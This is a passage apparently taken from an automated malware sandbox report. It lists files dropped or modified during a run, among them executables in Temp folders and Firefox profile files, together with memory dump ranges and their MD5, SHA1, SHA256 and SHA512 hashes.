| SHA512 | 3fba4eb7a2bc21fc24a6e29495e598efc5f208db030b13de8af43a392a93e3a920e4e8e4b68e10d4dc4a0e8779401ca738172ca9cba2ddc2246854c41a8a58a5 |
memory/2400-671-0x0000000000400000-0x0000000000840000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107940101\1a8233e8ee.exe
| MD5 | 8043b20e32ff2f0c75e9a3eed0c4bf07 |
| SHA1 | 5464aa1bc2a91c64cd8c4cbbb6970e8189c158a3 |
| SHA256 | 69a487512dfb97f08d068d0f9dd3924f42bef46bddd79112cb206b00fc16713e |
| SHA512 | 35639c6aad3dd25f606ca72ad108f774b083fa62677772242d357d59add9bba1dc85532d58ae67277d90c04dd4a5189548ca331fe93ee086c31cacbf11b8a18c |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\AlternateServices.bin
| MD5 | 463a7ae0ff86b11d010a64e4c9aee7a5 |
| SHA1 | fdaf7e5fbdb90ce33364d429544e2f5d910cf5b7 |
| SHA256 | 5f309e0e87c54bbd940e6399eced9492da05c17365bfe11c81638269a0e0bb6e |
| SHA512 | faed708dc9c39c4206fc798817884ce8df4566760c0f2f530ebbc71bc24f6635ab14d6e2ebd9603c5cbaaeaaecd816314f6a54de4e7ec5204183adcf55fb7999 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\58tontji.default-release\activity-stream.discovery_stream.json
| MD5 | 1f85371e72951bbc67cd29808d0076dd |
| SHA1 | 2f3636bada3d08517e52b29525d065d6dae6cbfa |
| SHA256 | 112cbfeacdd2efb5ef37388d58009f147c4b9f3dd7dbef620b95437f5c0ecf14 |
| SHA512 | 8a6b237875cb3ab5d1eda5870e276e6e3011b232d4962242581ca5d4946ce1e0d0576e62d019016aaacde13f3a3d4772b698ec3de2371e22be5c6edb5652a714 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\datareporting\glean\pending_pings\2a9dfd87-370d-4332-a901-a7b353c8df64
| MD5 | fbe16b9eb8db9ad6ad3c88ee280a6c3c |
| SHA1 | 2a3305fc7b4847d61bbaf9c2a181da0f3338316e |
| SHA256 | b3c00109c814078cf37c2d24f10515763cebeee40c9c7912a574a8efbca97790 |
| SHA512 | 17aeab6794f619f504fb98ed08aba62b31da7873e9a7d36b55d4c44d791695bb39f408f3f9876d651625c433601b4c5932cefade1731de7ecabeb6c2bb281d96 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\datareporting\glean\pending_pings\4c6875ae-4fb4-49b8-a3fe-4e46c2d92175
| MD5 | ea68e3047d8a6218fbba02c9327f4ab2 |
| SHA1 | dbada4af8da5f8d839fa536284ecc49ee559c0aa |
| SHA256 | 848912f2067591de26200b8f31f3f10f9074decf3a19338c48d5c3233f510173 |
| SHA512 | aac959380b74404a12f2c975093d68181fa329f5b53e505e931a8d5dddd013405057b18b8eb540c0c2f7dc01662e61d8eb2d1fc9d66cbae0b36a26eb83833a8e |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\datareporting\glean\pending_pings\e6f59a4c-aff8-4474-929b-a6765456370a
| MD5 | 04b827868c08d54c6c2dc88ce8829d32 |
| SHA1 | 9048d17fa133afd8ba56da1b2d64113e082ae60d |
| SHA256 | 7a0be68e8300e1c665b677e87f07eed0fac1365e7673dfb4dfac4db38756ea5e |
| SHA512 | 7042b39005ab4b0c218dd6cede15102171aa0cde92ae2917dded689a410aeb6c823e6e2cb4b8bf45dbdde3575bd30d7cfc3e1b41db378a8145db53ca819d6159 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 00b5792cdd6ee60541924c478d61e7b4 |
| SHA1 | 743ab572232742f62baa6161650b22fed4f58167 |
| SHA256 | a08d26cc9f7a992bd92cd95461b0b646722c347d4e64d3de081230c6c554d3d7 |
| SHA512 | 8066fafbc063a277bfdd8a43d6e3e2e1018c2b6ec31952ae1f3f40ce71be1c92f1b4bb43906f74bc18f0a29e7649f7f044133ee0cfbbbe9a475223a4cf5acbc3 |
memory/5232-729-0x0000000000830000-0x0000000000C88000-memory.dmp
memory/5232-937-0x0000000000830000-0x0000000000C88000-memory.dmp
memory/5232-961-0x0000000000830000-0x0000000000C88000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 37b97fe6d8f879395b2f1f8aa5d6afe3 |
| SHA1 | 9347bbdc4e4f13b1c4657da2c5b6a2d592c99f36 |
| SHA256 | 4b36bbe6cf4ecd8dff24eba20cfd455efb5cb7aadbf154b02eb91250fc6eaa30 |
| SHA512 | 4107bf08ebbe7cf58433104bad79357c8b95f9e406365bce62f01123602fd8afaa5085329de57d23cdf9c9f77bcc021eec9ef3e10eff715b17a591754ce9c8b7 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\prefs.js
| MD5 | 53d96046f8aebeab5fedf92ce63217cb |
| SHA1 | f19a6e7b886a92f7e59e6ffeab11c6b30aa9bfa6 |
| SHA256 | df7aaad4ae8a6b23a17c763945119c00f3ad5cfbe2e89dac981b0d9e570bd171 |
| SHA512 | cd050891afc687dda0f4f57f9dfab81660294ac218ee88e1b3d37b17148aa3460e606f07c3e181915dddbb4ac3761306787ed92ac86ee4e4803529b3f7d39ce0 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\AlternateServices.bin
| MD5 | b8a837f08a624d85f0243557d120a683 |
| SHA1 | 6172baed2ac554d5e5d0157fc3dffa2ce66cb880 |
| SHA256 | 911c444d68d4a7b61c6f3789635fcb4a62a841266ec4c2577fe156827d757233 |
| SHA512 | f95e5ae12ae8bc6bb71a27d007675aaebf2ca1c9b77621488b2a2cb21aac7748cb62d2516d118309d525c0b73a1d0fc756e2fefaaea4a1ff2268d1dd57cf3151 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\AlternateServices.bin
| MD5 | 1d946d1e8be7221f7e28eb9a1b85d9bc |
| SHA1 | da446331a66e7bb442350b298ed6f77fda6a09c9 |
| SHA256 | fd96defb65af0bd52250a9540199495382f66ea06d55a890cbb40122c30eacf6 |
| SHA512 | 9e7880a5c7652e66cc7da07a0324cb638aa244d5564e20a5e72a913ba0b16c2b9552f1420f05cdb1957609949f36d0230e8e05f5eaa6341468b7a232409a7cf6 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\prefs-1.js
| MD5 | fffc47194bae0e547af96e1b33d6b77d |
| SHA1 | c543a27c59b3451a57bf262d58e74fa2f3f2adca |
| SHA256 | a7ccfddc6c66f775230e77d9cc2c2f55c8261ede22445db699c5a8800a42a628 |
| SHA512 | f56484bc23d69f629e0e5e8bbe4880b89143677f1ecd6562ba12e45e604cf66e2a9863919e8bb76ca77a5c1562c9dedee4228956e4970c9bf0483d3203ee0f49 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\EEUCUS8F\soft[1]
| MD5 | f49d1aaae28b92052e997480c504aa3b |
| SHA1 | a422f6403847405cee6068f3394bb151d8591fb5 |
| SHA256 | 81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0 |
| SHA512 | 41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773 |
memory/5232-1096-0x0000000000830000-0x0000000000C88000-memory.dmp
memory/5232-1105-0x0000000000830000-0x0000000000C88000-memory.dmp
memory/5712-1107-0x0000000000450000-0x000000000090F000-memory.dmp
memory/5712-1109-0x0000000000450000-0x000000000090F000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | ece6efc63f8f53510b3dca9b20f9ab12 |
| SHA1 | fc744e5fefe97f8649fd4533233bca4b1398fd4a |
| SHA256 | 0e3f22c0070fa9cadea1a99531b4ae39b3eebd0e52c1a4be40ba6bf228747584 |
| SHA512 | 756e4dbd2929b5f15458113c3fdf7c6391dbb3bb2ad681d544275e565b7a4d1d039820a39e7c0293039de504f6874556c69b8da31a9bc511e2233d83938b4851 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
| MD5 | 2a461e9eb87fd1955cea740a3444ee7a |
| SHA1 | b10755914c713f5a4677494dbe8a686ed458c3c5 |
| SHA256 | 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc |
| SHA512 | 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
| MD5 | 842039753bf41fa5e11b3a1383061a87 |
| SHA1 | 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153 |
| SHA256 | d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c |
| SHA512 | d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157 |
C:\Users\Admin\AppData\Local\Temp\tmpaddon
| MD5 | 09372174e83dbbf696ee732fd2e875bb |
| SHA1 | ba360186ba650a769f9303f48b7200fb5eaccee1 |
| SHA256 | c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f |
| SHA512 | b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\prefs-1.js
| MD5 | 9518958f576f9811e1c10a20e4e4e880 |
| SHA1 | aa0a284e664da53808f83d08050544be945ec2ca |
| SHA256 | ad65974bfacbb2c599381ac478b8c8973805ba495d5176a43916f5cf267aecf2 |
| SHA512 | 43db5294a9cde8ae222904dd79f655df62b48accce887cafd8e650b5d7869a80c5c6d3c0499f89b1b7c3f7e62c6df8b05854dc4e72e7e392285f2793a846b574 |
C:\Users\Admin\AppData\Local\Temp\10107970101\Ps7WqSx.exe
| MD5 | dab2bc3868e73dd0aab2a5b4853d9583 |
| SHA1 | 3dadfc676570fc26fc2406d948f7a6d4834a6e2c |
| SHA256 | 388bd0f4fe9fca2897b29caac38e869905fd7d43c1512ca3fb9b772fbf2584eb |
| SHA512 | 3aefebe985050dbbd196e20e7783ada4c74a57fb167040323390c35a5c7b0185cb865591bf77096ff2bb5269c4faa62c70f6c18fc633851efa3c7f8eefe1ceb8 |
memory/5496-1216-0x0000000000270000-0x000000000095E000-memory.dmp
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\58tontji.default-release\cache2\entries\ADF5BD09EB688DAB1F35EE02E8C35329D0E4AD89
| MD5 | 6634e045ea77c37dde6391b4498eee78 |
| SHA1 | fa57d63bfc6565a985f894fbaacee45e1652062d |
| SHA256 | 01016ee7a7abcd878e0aada10300bd6ca2323c5a31efd6583f7211abb2116463 |
| SHA512 | 5bb515b22347e3abae5286a549c74e48c7d5eaa2426193b82ad83d2bc70271bbc972d147703d549acd3c40da61e8f050ff34c07dbd2b0166aea9446c359c4803 |
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1
| MD5 | 0a8747a2ac9ac08ae9508f36c6d75692 |
| SHA1 | b287a96fd6cc12433adb42193dfe06111c38eaf0 |
| SHA256 | 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03 |
| SHA512 | 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
| MD5 | bf957ad58b55f64219ab3f793e374316 |
| SHA1 | a11adc9d7f2c28e04d9b35e23b7616d0527118a1 |
| SHA256 | bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda |
| SHA512 | 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
| MD5 | daf7ef3acccab478aaa7d6dc1c60f865 |
| SHA1 | f8246162b97ce4a945feced27b6ea114366ff2ad |
| SHA256 | bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e |
| SHA512 | 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
| MD5 | ff086d402e40fbec7605ed7319475754 |
| SHA1 | 780dc8b4a7029c913db2cb6014d103b2f196c115 |
| SHA256 | ecee1b046b8dfd41c7c39e1689630f345edc313a3ba532daefe694602e499f99 |
| SHA512 | 3091c3be3ff8944cf2c192f84e22b148bd3156167cd7ce5bd35f479e18971869fc362b30faba8c2dc060d29711533e460760e0d35d11bc03c07ad46c50e91f36 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\58tontji.default-release\cache2\entries\8DF0E9F84C5909278CF68CB55A683669F40995FB
| MD5 | d176c8de49b621a746acd1e113f81b0b |
| SHA1 | 38a90a32b2b131e52a08a75543faae98872480be |
| SHA256 | 357332277d1b6c8507dd937e50f5035c80b464d029598a4be632919c039df171 |
| SHA512 | c5f53252844ccaec5ecc39573c10538d327fee4beeedb30660789873172022c13aa7c7859832b391cae7f192a63571cf8e0b90d22b97cbcfba4691d28a6a75cf |
C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe
| MD5 | f155a51c9042254e5e3d7734cd1c3ab0 |
| SHA1 | 9d6da9f8155b47bdba186be81fb5e9f3fae00ccf |
| SHA256 | 560c7869df511c5ea54f20be704bbda02e1623d0867333a90ac3783d29eae7af |
| SHA512 | 67ec5546d96e83a3c6f4197a50812f585b96b4f34a2b8d77503b51cddd4ea5a65d5416c3efc427a5e58119fa068125987e336efb2dfd5811fe59145aa5f5bd6a |
memory/5640-1568-0x0000000000070000-0x0000000000511000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\prefs-1.js
| MD5 | 3164eac1799c58364a773c6f346dd59a |
| SHA1 | db6580fff234ad86eb134fe60443b329b6bff766 |
| SHA256 | 259185460ee226000fa274f22d108bbdf906dc182d936ed5870e86b85e5fece0 |
| SHA512 | 8d8870c176675cd5d0afc61cadc7f6615b44f190752bb296a70317a7d65e59b3cf9d703b5ff66077b717f54f38af5cc885377d78c08f9a8b3d65fbedd1113185 |
C:\ProgramData\72B093CA62FBDFDF.dat
| MD5 | a182561a527f929489bf4b8f74f65cd7 |
| SHA1 | 8cd6866594759711ea1836e86a5b7ca64ee8911f |
| SHA256 | 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914 |
| SHA512 | 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558 |